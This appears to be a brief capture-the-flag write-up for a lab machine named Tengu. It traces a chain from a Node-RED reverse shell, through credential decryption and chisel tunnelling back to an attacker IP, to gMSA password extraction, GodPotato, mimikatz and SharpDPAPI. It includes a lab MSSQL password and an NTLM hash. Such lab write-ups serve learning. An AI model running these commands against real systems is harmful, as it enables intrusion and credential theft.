Tengu

Found Node-red on one of the 3 machines and created a node to get reverse shell and got ssh access.

Now enumerating Node-red found creds for MSSQLwhich contains some credential files We can find this in the files: Now we need to decrypt this password: https://blog.hugopoi.net/en/2021/12/28/how-to-decrypt-flows_cred-json-from-nodered-data/ Running it now: ./cred_decode.sh . ./cred_decode.sh .

Now checking access to mssql from this machine: Now we can port forward with chisel Target: ./chisel client 10.8.1.208:8001 R:socks Attacker: chisel server --reverse --socks5 -p 8001

Now using proxychains with mssqlclient:

proxychains mssqlclient.py nodered_connector:'DreamPuppyOverall25'@10.10.135.166

Now enumerating database DemoS And using crackstation we get the password

Now checking linux for the realm we can switch to domain user and get flag:

Now using KeyTabExtract on /etc/krb5.keytab

Using bloodhound: We can get gmsa password with

proxychains nxc ldap tengu.vl -u NODERED$ -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa

Now we can use this to impersonate users in the SQL)ADMINS group

There's 2 users in the group:

Trying T1_C.FOWLER

Not allowed

Now trying t1_m.winters we get a ticket.

To login to mssql:

Now we can get reverse shell with:

Now we can use Godpotato as we have SeImpersonate permission:

Now using mimikatz:

Now using [[SharpDPAPI]] we can get credentials

Using these credentials with netexec we get STATUS_ACCOUNT_RESTRICTION

We can use kerkeros authentication:

Then use

Last updated

Was this helpful?